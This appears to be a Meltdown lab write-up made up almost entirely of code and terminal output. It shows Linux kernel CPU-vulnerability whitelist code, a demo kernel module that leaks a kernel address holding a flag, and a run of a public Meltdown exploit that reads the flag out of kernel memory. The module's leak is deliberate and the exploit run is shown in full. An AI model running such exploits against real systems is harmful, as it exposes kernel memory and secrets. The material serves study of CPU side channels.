733 Server / Workstation CPUs
443 Desktop CPUs
584 Mobile CPUs
51 Mobile SoCs

➜  cat /proc/version
Linux version 4.15.0-101-generic (buildd@lgw01-amd64-052) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)) #102~16.04.1-Ubuntu SMP Mon May 11 11:38:16 UTC 2020

➜  cat /proc/cpuinfo | grep bugs
bugs		: cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs taa itlb_multihit

if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
    return;

/* Rogue Data Cache Load? No! */
if (ia32_cap & ARCH_CAP_RDCL_NO)
    return;

setup_force_cpu_bug(X86_BUG_CPU_MELTDOWN);

static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
	VULNWL(ANY,	4, X86_MODEL_ANY,	NO_SPECULATION),
	VULNWL(CENTAUR,	5, X86_MODEL_ANY,	NO_SPECULATION),
	VULNWL(INTEL,	5, X86_MODEL_ANY,	NO_SPECULATION),
	VULNWL(NSC,	5, X86_MODEL_ANY,	NO_SPECULATION),

	/* Intel Family 6 */
	VULNWL_INTEL(ATOM_SALTWELL,		NO_SPECULATION | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_SALTWELL_TABLET,	NO_SPECULATION | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_SALTWELL_MID,		NO_SPECULATION | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_BONNELL,		NO_SPECULATION | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_BONNELL_MID,		NO_SPECULATION | NO_ITLB_MULTIHIT),

	VULNWL_INTEL(ATOM_SILVERMONT,		NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_SILVERMONT_D,		NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_SILVERMONT_MID,	NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_AIRMONT,		NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(XEON_PHI_KNL,		NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(XEON_PHI_KNM,		NO_SSB | NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),

	VULNWL_INTEL(CORE_YONAH,		NO_SSB),

	VULNWL_INTEL(ATOM_AIRMONT_MID,		NO_L1TF | MSBDS_ONLY | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_AIRMONT_NP,		NO_L1TF | NO_SWAPGS | NO_ITLB_MULTIHIT),

	VULNWL_INTEL(ATOM_GOLDMONT,		NO_MDS | NO_L1TF | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_GOLDMONT_D,		NO_MDS | NO_L1TF | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_INTEL(ATOM_GOLDMONT_PLUS,	NO_MDS | NO_L1TF | NO_SWAPGS | NO_ITLB_MULTIHIT),

	/*
	 * Technically, swapgs isn't serializing on AMD (despite it previously
	 * being documented as such in the APM).  But according to AMD, %gs is
	 * updated non-speculatively, and the issuing of %gs-relative memory
	 * operands will be blocked until the %gs update completes, which is
	 * good enough for our purposes.
	 */

	VULNWL_INTEL(ATOM_TREMONT_D,		NO_ITLB_MULTIHIT),

	/* AMD Family 0xf - 0x12 */
	VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),

	/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
	VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
	VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),

	/* Zhaoxin Family 7 */
	VULNWL(CENTAUR,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS),
	VULNWL(ZHAOXIN,	7, X86_MODEL_ANY,	NO_SPECTRE_V2 | NO_SWAPGS),
	{}
};

#define VULNWL_INTEL(model, whitelist)		\
	VULNWL(INTEL, 6, INTEL_FAM6_##model, whitelist)
#define VULNWL(vendor, family, model, whitelist)	\
	X86_MATCH_VENDOR_FAM_MODEL(vendor, family, model, whitelist)

/**
 * X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE - Base macro for CPU matching
 * @_vendor:	The vendor name, e.g. INTEL, AMD, HYGON, ..., ANY
 *		The name is expanded to X86_VENDOR_@_vendor
 * @_family:	The family number or X86_FAMILY_ANY
 * @_model:	The model number, model constant or X86_MODEL_ANY
 * @_steppings:	Bitmask for steppings, stepping constant or X86_STEPPING_ANY
 * @_feature:	A X86_FEATURE bit or X86_FEATURE_ANY
 * @_data:	Driver specific data or NULL. The internal storage
 *		format is unsigned long. The supplied value, pointer
 *		etc. is casted to unsigned long internally.
 *
 * Use only if you need all selectors. Otherwise use one of the shorter
 * macros of the X86_MATCH_* family. If there is no matching shorthand
 * macro, consider to add one. If you really need to wrap one of the macros
 * into another macro at the usage site for good reasons, then please
 * start this local macro with X86_MATCH to allow easy grepping.
 */
#define X86_MATCH_VENDOR_FAM_MODEL_STEPPINGS_FEATURE(_vendor, _family, _model, \
						    _steppings, _feature, _data) { \
	.vendor		= X86_VENDOR_##_vendor,				\
	.family		= _family,					\
	.model		= _model,					\
	.steppings	= _steppings,					\
	.feature	= _feature,					\
	.driver_data	= (unsigned long) _data				\
}

#include <asm/intel-family.h>
/* And the X86_VENDOR_* ones */

/* SPDX-License-Identifier: GPL-2.0 */
#ifndef _ASM_X86_INTEL_FAMILY_H
#define _ASM_X86_INTEL_FAMILY_H

/*
 * "Big Core" Processors (Branded as Core, Xeon, etc...)
 *
 * While adding a new CPUID for a new microarchitecture, add a new
 * group to keep logically sorted out in chronological order. Within
 * that group keep the CPUID for the variants sorted by model number.
 *
 * The defined symbol names have the following form:
 *	INTEL_FAM6{OPTFAMILY}_{MICROARCH}{OPTDIFF}
 * where:
 * OPTFAMILY	Describes the family of CPUs that this belongs to. Default
 *		is assumed to be "_CORE" (and should be omitted). Other values
 *		currently in use are _ATOM and _XEON_PHI
 * MICROARCH	Is the code name for the micro-architecture for this core.
 *		N.B. Not the platform name.
 * OPTDIFF	If needed, a short string to differentiate by market segment.
 *
 *		Common OPTDIFFs:
 *
 *			- regular client parts
 *		_L	- regular mobile parts
 *		_G	- parts with extra graphics on
 *		_X	- regular server parts
 *		_D	- micro server parts
 *
 *		Historical OPTDIFFs:
 *
 *		_EP	- 2 socket server parts
 *		_EX	- 4+ socket server parts
 *
 * The #define line may optionally include a comment including platform names.
 */

/* Wildcard match for FAM6 so X86_MATCH_INTEL_FAM6_MODEL(ANY) works */
#define INTEL_FAM6_ANY			X86_MODEL_ANY

#define INTEL_FAM6_CORE_YONAH		0x0E

#define INTEL_FAM6_CORE2_MEROM		0x0F
#define INTEL_FAM6_CORE2_MEROM_L	0x16
#define INTEL_FAM6_CORE2_PENRYN		0x17
#define INTEL_FAM6_CORE2_DUNNINGTON	0x1D

#define INTEL_FAM6_NEHALEM		0x1E
#define INTEL_FAM6_NEHALEM_G		0x1F /* Auburndale / Havendale */
#define INTEL_FAM6_NEHALEM_EP		0x1A
#define INTEL_FAM6_NEHALEM_EX		0x2E

#define INTEL_FAM6_WESTMERE		0x25
#define INTEL_FAM6_WESTMERE_EP		0x2C
#define INTEL_FAM6_WESTMERE_EX		0x2F

#define INTEL_FAM6_SANDYBRIDGE		0x2A
#define INTEL_FAM6_SANDYBRIDGE_X	0x2D
#define INTEL_FAM6_IVYBRIDGE		0x3A
#define INTEL_FAM6_IVYBRIDGE_X		0x3E

#define INTEL_FAM6_HASWELL		0x3C
#define INTEL_FAM6_HASWELL_X		0x3F
#define INTEL_FAM6_HASWELL_L		0x45
#define INTEL_FAM6_HASWELL_G		0x46

#define INTEL_FAM6_BROADWELL		0x3D
#define INTEL_FAM6_BROADWELL_G		0x47
#define INTEL_FAM6_BROADWELL_X		0x4F
#define INTEL_FAM6_BROADWELL_D		0x56

#define INTEL_FAM6_SKYLAKE_L		0x4E
#define INTEL_FAM6_SKYLAKE		0x5E
#define INTEL_FAM6_SKYLAKE_X		0x55
#define INTEL_FAM6_KABYLAKE_L		0x8E
#define INTEL_FAM6_KABYLAKE		0x9E

#define INTEL_FAM6_CANNONLAKE_L		0x66

#define INTEL_FAM6_ICELAKE_X		0x6A
#define INTEL_FAM6_ICELAKE_D		0x6C
#define INTEL_FAM6_ICELAKE		0x7D
#define INTEL_FAM6_ICELAKE_L		0x7E
#define INTEL_FAM6_ICELAKE_NNPI		0x9D

#define INTEL_FAM6_TIGERLAKE_L		0x8C
#define INTEL_FAM6_TIGERLAKE		0x8D

#define INTEL_FAM6_COMETLAKE		0xA5
#define INTEL_FAM6_COMETLAKE_L		0xA6

/* "Small Core" Processors (Atom) */

#define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
#define INTEL_FAM6_ATOM_BONNELL_MID	0x26 /* Silverthorne, Lincroft */

#define INTEL_FAM6_ATOM_SALTWELL	0x36 /* Cedarview */
#define INTEL_FAM6_ATOM_SALTWELL_MID	0x27 /* Penwell */
#define INTEL_FAM6_ATOM_SALTWELL_TABLET	0x35 /* Cloverview */

#define INTEL_FAM6_ATOM_SILVERMONT	0x37 /* Bay Trail, Valleyview */
#define INTEL_FAM6_ATOM_SILVERMONT_D	0x4D /* Avaton, Rangely */
#define INTEL_FAM6_ATOM_SILVERMONT_MID	0x4A /* Merriefield */

#define INTEL_FAM6_ATOM_AIRMONT		0x4C /* Cherry Trail, Braswell */
#define INTEL_FAM6_ATOM_AIRMONT_MID	0x5A /* Moorefield */
#define INTEL_FAM6_ATOM_AIRMONT_NP	0x75 /* Lightning Mountain */

#define INTEL_FAM6_ATOM_GOLDMONT	0x5C /* Apollo Lake */
#define INTEL_FAM6_ATOM_GOLDMONT_D	0x5F /* Denverton */

/* Note: the micro-architecture is "Goldmont Plus" */
#define INTEL_FAM6_ATOM_GOLDMONT_PLUS	0x7A /* Gemini Lake */

#define INTEL_FAM6_ATOM_TREMONT_D	0x86 /* Jacobsville */
#define INTEL_FAM6_ATOM_TREMONT		0x96 /* Elkhart Lake */
#define INTEL_FAM6_ATOM_TREMONT_L	0x9C /* Jasper Lake */

/* Xeon Phi */

#define INTEL_FAM6_XEON_PHI_KNL		0x57 /* Knights Landing */
#define INTEL_FAM6_XEON_PHI_KNM		0x85 /* Knights Mill */

/* Family 5 */
#define INTEL_FAM5_QUARK_X1000		0x09 /* Quark X1000 SoC */

#endif /* _ASM_X86_INTEL_FAMILY_H */

VULNWL_AMD(0x0f,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
VULNWL_AMD(0x10,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
VULNWL_AMD(0x11,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
VULNWL_AMD(0x12,	NO_MELTDOWN | NO_SSB | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),

/* FAMILY_ANY must be last, otherwise 0x0f - 0x12 matches won't work */
VULNWL_AMD(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),
VULNWL_HYGON(X86_FAMILY_ANY,	NO_MELTDOWN | NO_L1TF | NO_MDS | NO_SWAPGS | NO_ITLB_MULTIHIT),

if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
    return;

/* Rogue Data Cache Load? No! */
if (ia32_cap & ARCH_CAP_RDCL_NO)
    return;

setup_force_cpu_bug(X86_BUG_CPU_MELTDOWN);

Intel processors which have the ARCH_CAP_RDCL_NO bit set in the IA32_ARCH_CAPABILITIES MSR. If the bit is set the CPU is not affected by the Meltdown vulnerability either. These CPUs should become available by end of 2018.

# include <linux/module.h>
# include <linux/init.h>
# include <linux/cdev.h>
# include <linux/fs.h>
# include <linux/uaccess.h>
# include <linux/timer.h>
# include <linux/timex.h>
# include <linux/rtc.h>
# include <asm/io.h>
# include <asm/uaccess.h>

# define MEM_SIZE 4096

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("meltdown demo");

struct mem_dev{
    struct cdev cdev;
    char mem[MEM_SIZE];
    dev_t devno;
    struct semaphore sem;
};
struct mem_dev my_dev;

long mem_ioctl(struct file *fd, unsigned int cmd, unsigned long arg){
    switch(cmd){
    case 0:
        printk("<0> memdev is restart");
        break;
    default:
        return -EINVAL;
    }
    return 0;
}


int mem_open(struct inode *inode, struct file *filp){
    int num = MINOR(inode->i_rdev);
    if(num == 0){
        filp -> private_data = my_dev.mem;
    }
    return 0;
}

int mem_release(struct inode *inode, struct file *filp){
    return 0;
}

static ssize_t mem_read(
    struct file *filp, char __user *buf, size_t size, loff_t *ppos){
    int * pbase = filp -> private_data;
    unsigned long p = *ppos;
    unsigned int count = size;
    int ret = 0;
    char* pm = my_dev.mem;
    uint64_t address = (uint64_t)pm;
    char tmpflag[]="flag{this_is_real_flag}";

    struct timex txc;
    struct rtc_time tm;
    do_gettimeofday(&(txc.time));
    rtc_time_to_tm(txc.time.tv_sec,&tm);

    strcpy(my_dev.mem, tmpflag); 

    if(p >= MEM_SIZE)
        return 0;
    if(count > MEM_SIZE - p)
        count = MEM_SIZE - p;
    if(down_interruptible(&my_dev.sem))
        return - ERESTARTSYS;
	if(copy_to_user(buf,&address,8)){
       ret = - EFAULT;
    }else{
        *ppos += count;
        ret = count;
    }
    up(&my_dev.sem);
    return ret;
}

static loff_t mem_llseek(struct file *filp, loff_t offset, int whence){ 

    loff_t newpos;

    switch(whence) {
        case SEEK_SET:
            newpos = offset;
            break;
        case SEEK_CUR:
            newpos = filp->f_pos + offset;
            break;
        case SEEK_END: 
            newpos = MEM_SIZE * sizeof(int)-1 + offset;
            break;
        default:
            return -EINVAL;
    }

     if ((newpos<0) || (newpos>MEM_SIZE * sizeof(int)))
         return -EINVAL;
     
     filp->f_pos = newpos;
     return newpos;

}

const struct file_operations mem_ops = {
    .llseek = mem_llseek,
    .open = mem_open,
    .read = mem_read,
    .release = mem_release,
    .unlocked_ioctl = mem_ioctl,
};

static int memdev_init(void){
    int ret = -1;
    printk("memdev init");

    ret = alloc_chrdev_region(&my_dev.devno,0,1,"memdev");
    if (ret >= 0){
        cdev_init(&my_dev.cdev,&mem_ops);
        cdev_add(&my_dev.cdev,my_dev.devno,1);
    }
    sema_init(&my_dev.sem,1);
	
	char* flag="";
	strcpy(my_dev.mem, flag); 
	
    return ret;   
}

static void memdev_exit(void){
    cdev_del(&my_dev.cdev);
    unregister_chrdev_region(my_dev.devno,1);

}

module_init(memdev_init);
module_exit(memdev_exit);

$ gcc memdev.c
memdev.c:1:26: fatal error: linux/module.h: No such file or directory
compilation terminated.

KVERS = $(shell uname -r)

obj-m += memdev.o

build: kernel_modules

kernel_modules:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

clean:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean

$ ls
Makefile  memdev.c
$ make
make -C /lib/modules/3.13.0-32-generic/build M=/mnt/hgfs/桌面/pwn/meltdown/memdev modules
make[1]: Entering directory `/usr/src/linux-headers-3.13.0-32-generic'
  CC [M]  /mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.o
/mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.c: In function ‘mem_read’:
/mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.c:51:11: warning: unused variable ‘pbase’ [-Wunused-variable]
/mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.c: In function ‘memdev_init’:
/mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.c:129:2: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.mod.o
  LD [M]  /mnt/hgfs/桌面/pwn/meltdown/memdev/memdev.ko
make[1]: Leaving directory `/usr/src/linux-headers-3.13.0-32-generic'
$ ls
Makefile  memdev.ko     memdev.mod.o  modules.order
memdev.c  memdev.mod.c  memdev.o      Module.symvers

KVERS = $(shell uname -r)

obj-m += memdev.o

build: kernel_modules

kernel_modules:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

clean:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean

$ uname -r
3.13.0-32-generic

$ pwd
/lib/modules/3.13.0-32-generic/build
$ ls
arch           drivers   init     kernel    Module.symvers  security  usr
block          firmware  ipc      lib       net             sound     virt
crypto         fs        Kbuild   Makefile  samples         tools
Documentation  include   Kconfig  mm        scripts         ubuntu

# include <linux/module.h>
# include <linux/init.h>
# include <linux/cdev.h>
# include <linux/fs.h>
# include <linux/uaccess.h>
# include <linux/timer.h>
# include <linux/timex.h>
# include <linux/rtc.h>
# include <asm/io.h>
# include <asm/uaccess.h>

$ sudo insmod ./memdev.ko
$ lsmod | grep memdev
memdev                 16828  0 

$ cat /proc/devices | grep memdev
250 memdev

# mknod 设备节点 c（代表字符设备）主设备号 次设备号
$ sudo mknod /dev/memdev0 c 250 0

$ ls /dev/memdev0 
/dev/memdev0

$cat /dev/memdev0 
��6�����

$ cat /dev/memdev0 | base64
yOI2oP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

➜  ~ echo "yOI2oP////8AA" | base64 -d | hexyl
┌────────┬─────────────────────────┬─────────────────────────┬────────┬────────┐
│00000000│ c8 e2 36 a0 ff ff ff ff ┊ 00                      │××6×××××┊0       │
└────────┴─────────────────────────┴─────────────────────────┴────────┴────────┘

$ git remote -v
origin	https://github.com/paboldin/meltdown-exploit.git (fetch)
origin	https://github.com/paboldin/meltdown-exploit.git (push)
$ make
./detect_rdtscp.sh >rdtscp.h
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ strings meltdown | grep memdev
/dev/memdev0
$ ./meltdown 0xffffffffa036e2c8 20
cached = 35, uncached = 309, threshold 104
read ffffffffa036e2c8 = 66 f (score=979/1000)
read ffffffffa036e2c9 = 6c l (score=922/1000)
read ffffffffa036e2ca = 61 a (score=985/1000)
read ffffffffa036e2cb = 67 g (score=986/1000)
read ffffffffa036e2cc = 7b { (score=498/1000)
read ffffffffa036e2cd = 74 t (score=974/1000)
read ffffffffa036e2ce = 68 h (score=970/1000)
read ffffffffa036e2cf = 69 i (score=995/1000)
read ffffffffa036e2d0 = 73 s (score=964/1000)
read ffffffffa036e2d1 = 5f _ (score=984/1000)
read ffffffffa036e2d2 = 69 i (score=986/1000)
read ffffffffa036e2d3 = 73 s (score=967/1000)
read ffffffffa036e2d4 = 5f _ (score=968/1000)
read ffffffffa036e2d5 = 72 r (score=984/1000)
read ffffffffa036e2d6 = 65 e (score=954/1000)
read ffffffffa036e2d7 = 61 a (score=976/1000)
read ffffffffa036e2d8 = 6c l (score=983/1000)
read ffffffffa036e2d9 = 5f _ (score=978/1000)
read ffffffffa036e2da = 66 f (score=953/1000)
read ffffffffa036e2db = 6c l (score=984/1000)
read ffffffffa036e2dc = 61 a (score=987/1000)
read ffffffffa036e2dd = 67 g (score=964/1000)
read ffffffffa036e2de = 7d } (score=967/1000)
read ffffffffa036e2df = ff   (score=0/1000)
read ffffffffa036e2e0 = ff   (score=0/1000)
read ffffffffa036e2e1 = ff   (score=0/1000)
read ffffffffa036e2e2 = ff   (score=0/1000)
read ffffffffa036e2e3 = ff   (score=0/1000)
read ffffffffa036e2e4 = ff   (score=0/1000)
read ffffffffa036e2e5 = ff   (score=0/1000)
read ffffffffa036e2e6 = ff   (score=0/1000)
read ffffffffa036e2e7 = ff   (score=0/1000)
NOT VULNERABLE